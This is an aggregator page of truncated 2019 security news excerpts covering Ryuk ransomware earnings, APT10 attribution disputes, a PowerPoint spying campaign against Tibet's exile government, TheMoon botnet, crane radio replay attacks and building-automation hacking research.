Security Research – Page 18

Researchers paint different portraits of hackers behind Ryuk ransomware

Posted on February 20, 2019 by Sean Lyngaas

Analysts poring over the Ryuk ransomware are coming to different conclusions about the hackers responsible and the victims they’re targeting, highlighting the subjective side of cyberthreat studies. One thing, however, is clear: the infectious malware pays. Newly published research from McAfee and Coveware finds that the average ransom payment involving Ryuk is more than 10 times that of other types of ransomware. Some victims of Ryuk “either lost their data or took on staggering financial risk to pay the ransom,” the researchers wrote. In some cases, Ryuk’s purveyors took big payouts of over 100 bitcoin (nearly $400,000 at current rates), in others they were satisfied with squeezing smaller sums from the victims, the McAfee-Coveware report said. The research follows a January report from another company, CrowdStrike, saying that hackers had earned $3.7 million from Ryuk since the ransomware emerged in August. Victims have reportedly included a North Carolina water utility and multiple […]

The post Researchers paint different portraits of hackers behind Ryuk ransomware appeared first on CyberScoop.

Continue reading Researchers paint different portraits of hackers behind Ryuk ransomware→

Password manager report gets researcher booted from Bugcrowd

Posted on February 19, 2019 by Sean Lyngaas

The author of newly-published research that examines flaws in password managers has been kicked off Bugcrowd, a popular vulnerability-reporting platform, after one of the companies named in the research reported the author for violating Bugcrowd’s terms of service. Bugcrowd shut down Adrian Bednarek’s account after he violated the company’s rules on “unauthorized disclosure” by telling a reporter about a vulnerability in LastPass, a password management service. The vulnerability is an old bug that another researcher had already reported, but hadn’t been fixed. According to a disclosure timeline he shared with CyberScoop, Bednarek found himself banned from Bugcrowd on Feb 12., a day after he said he spoke with The Washington Post for a report that his consulting company, Independent Security Evaluators (ISE), ultimately published Tuesday. Bednarek had reported the vulnerability to Bugcrowd on Jan. 19. After being told it was a duplicate, he raised concerns that the bug still hadn’t been […]

The post Password manager report gets researcher booted from Bugcrowd appeared first on CyberScoop.

Continue reading Password manager report gets researcher booted from Bugcrowd→

Global Cyber Intelligence Maven Limor Kessem Is a Guiding Light for Women in Security

Posted on February 18, 2019 by Security Intelligence Staff

Limor Kessem studied microbiology in school and planned to open a naturopathy clinic. She’s now one of IBM Security’s top cyber intelligence experts and a dedicated role model for women in security.

The post Global Cyber Intelligence Maven Limor Kessem Is a Guiding Light for Women in Security appeared first on Security Intelligence.

Continue reading Global Cyber Intelligence Maven Limor Kessem Is a Guiding Light for Women in Security→

Right country, wrong group? Researchers say it wasn’t APT10 that hacked Norwegian software firm

Posted on February 12, 2019 by Sean Lyngaas

Keeping the world’s dizzying array of hacking groups straight has become a challenge for researchers and journalists. One person’s Helix Kitten is another’s OilRig, sowing confusion — in this writer as well as others — about where one group ends and the next one begins. But getting hacking taxonomy right matters because knowing which group is responsible for malicious activity can help network defenders secure their data. That’s why researchers from multiple companies are pointing out what they say is a case of mistaken attribution of a global hacking operation. A report published last week by cybersecurity companies Recorded Future and Rapid7, blamed a well-known Chinese threat group, labeled APT10 in the West, for breaching a Norwegian software vendor, a U.S. law firm, and an international apparel company. APT10, which U.S. officials and private analysts have linked to China’s civilian intelligence agency, gained greater notoriety in December when the Department of Justice announced […]

The post Right country, wrong group? Researchers say it wasn’t APT10 that hacked Norwegian software firm appeared first on CyberScoop.

Continue reading Right country, wrong group? Researchers say it wasn’t APT10 that hacked Norwegian software firm→

Hack of billion-dollar Norwegian firm is tied to Chinese espionage group APT10

Posted on February 6, 2019 by Sean Lyngaas

Weeks after the Department of Justice announced the indictment of two men linked with a Chinese state-sponsored hacking group, security researchers say they have uncovered a cyber-espionage campaign by the same entity against a European software company, a U.S. law firm, and a global apparel company. Analysts at Recorded Future and Rapid7 tracked the hacking operation between November 2017 and September 2018, and publicly revealed the breaches Wednesday. The researchers assessed with “high confidence” that APT10, a group tied to China’s civilian intelligence agency, was responsible for the hacking, calling the group “the most significant Chinese state-sponsored cyber threat to global corporations known to date.” Only one of the three victims is named: Visma, a billion-dollar Norwegian software company that claims 850,000 customers around the world. The hackers likely breached Visma to gain access to other organizations’ networks, the researchers said, but targeted the law and apparel firms “to gather information for commercial advantage.” Visma […]

The post Hack of billion-dollar Norwegian firm is tied to Chinese espionage group APT10 appeared first on CyberScoop.

Continue reading Hack of billion-dollar Norwegian firm is tied to Chinese espionage group APT10→

How hackers used a PowerPoint file to spy on Tibet’s government-in-exile

Posted on February 4, 2019 by Sean Lyngaas

A recently discovered PowerPoint file offers new clues on how hackers are trying to spy on Tibet’s government-in-exile. The malicious document was emailed to subscribers of a mailing list managed by the Central Tibetan Administration (CTA), the organization representing Tibet’s exiled government, according to Talos, Cisco’s threat intelligence unit. Tibet is officially part of China, but Tibetan leaders have lived in exile in India for decades. The email masqueraded as a file that would appeal to their politics. The PowerPoint file name – “Tibet-was-never-a-part-of-China.ppsx” – caters to the CTA mailing list, as does the message in the body of the email marking the upcoming 60th anniversary of the exile of Tibetan spiritual leader the Dalai Lama, researchers said. “Unfortunately, this [is] just part of a continuing trend of nation-state actors working to spy on civilian populations for political reasons,” Talos researchers said in a blog published Monday. They did not attribute the […]

The post How hackers used a PowerPoint file to spy on Tibet’s government-in-exile appeared first on CyberScoop.

Continue reading How hackers used a PowerPoint file to spy on Tibet’s government-in-exile→

CenturyLink sounds the alarm about TheMoon botnet, a versatile tool for fraud

Posted on January 31, 2019 by Sean Lyngaas

Botnets have been a staple of malicious cyber activity for years because they can be cheap and facilitate cyberattacks at scale. Now, new research highlights how versatile hordes of infected computers can be in catering to hackers’ needs, from advertisement fraud to brute-force attacks. Researchers at communications provider CenturyLink said Thursday they spent a year tracking a botnet dubbed TheMoon, which can be repurposed by hackers for a range of malicious services. CenturyLink’s team found an iteration of TheMoon that uses infected microprocessor-based devices as proxy servers that can be sold to other attackers. In one case, researchers said they watched a video-ad fraudster use a proxy service to send requests to 19,000 different URLs from one server in the span of six hours. The ease with which TheMoon enables fraud should have companies on alert. “We have reason to believe the botnet actor has sold this proxy botnet as a service to other […]

The post CenturyLink sounds the alarm about TheMoon botnet, a versatile tool for fraud appeared first on CyberScoop.

Continue reading CenturyLink sounds the alarm about TheMoon botnet, a versatile tool for fraud→

Look to the sky: How hackers could control cranes by abusing radio frequencies

Posted on January 15, 2019 by Sean Lyngaas

Vulnerabilities in radio frequency protocols used by remote controllers could allow hackers to move cranes and other big machinery at construction sites and factories, security researchers said Tuesday, raising awareness of potential safety issues in widely-used technology. A research team at cybersecurity company Trend Micro examined remote controllers made by seven vendors and found that all of them were susceptible to “replay attacks,” in which an attacker transmits a recorded radio frequency (RF), tricking the machinery into responding to commands. In other words, the researchers said, the remote control you use to open your garage is probably more secure than many controllers used to move industrial equipment. The main problem, Trend Micro said in a paper published Tuesday, is that instead of relying on standard wireless technologies, the industrial remote controllers depend on proprietary RF protocols that are decades old and “are primarily focused on safety at the expense of […]

The post Look to the sky: How hackers could control cranes by abusing radio frequencies appeared first on CyberScoop.

Continue reading Look to the sky: How hackers could control cranes by abusing radio frequencies→

Shadow SUID for Privilege Persistence: Part 2

Posted on January 15, 2019 by Dor Dankner

In Part II, we continue our journey exploring how Shadow SUID can be used for privilege escalation on Linux. Learn more in this technical deep dive
The post Shadow SUID for Privilege Persistence: Part 2 appeared first on Security Boulevard.
Continue reading Shadow SUID for Privilege Persistence: Part 2→

To raise security awareness, researchers spent months hacking mock building systems

Posted on January 15, 2019 by Sean Lyngaas

Security experts have in recent months warned that building-automation lags behind other critical infrastructure sectors when it comes to awareness of cyberthreats and appreciation of their potential impact. Now an 18-month research project, which tested malware and exploits on gear made by top vendors, is trying to change that. “In the 18 months that we’ve been working on this, we’ve engaged with a lot of stakeholders from the domain,” Elisa Costante, a senior director at ForeScout Technologies, told CyberScoop. “And now we really see that the reception has changed and everybody has realized the impact can be actually more critical” than many realized. After all, she said, the building-automation sector doesn’t just mean office buildings, but also includes hospitals, airports, and other critical infrastructure. ForeScout researchers assembled a lab of building-automation equipment, threw their custom malware at it, and then documented how effectively their code manipulated the gear. The project culminates Tuesday, when Costante will present her team’s work […]

The post To raise security awareness, researchers spent months hacking mock building systems appeared first on CyberScoop.

Continue reading To raise security awareness, researchers spent months hacking mock building systems→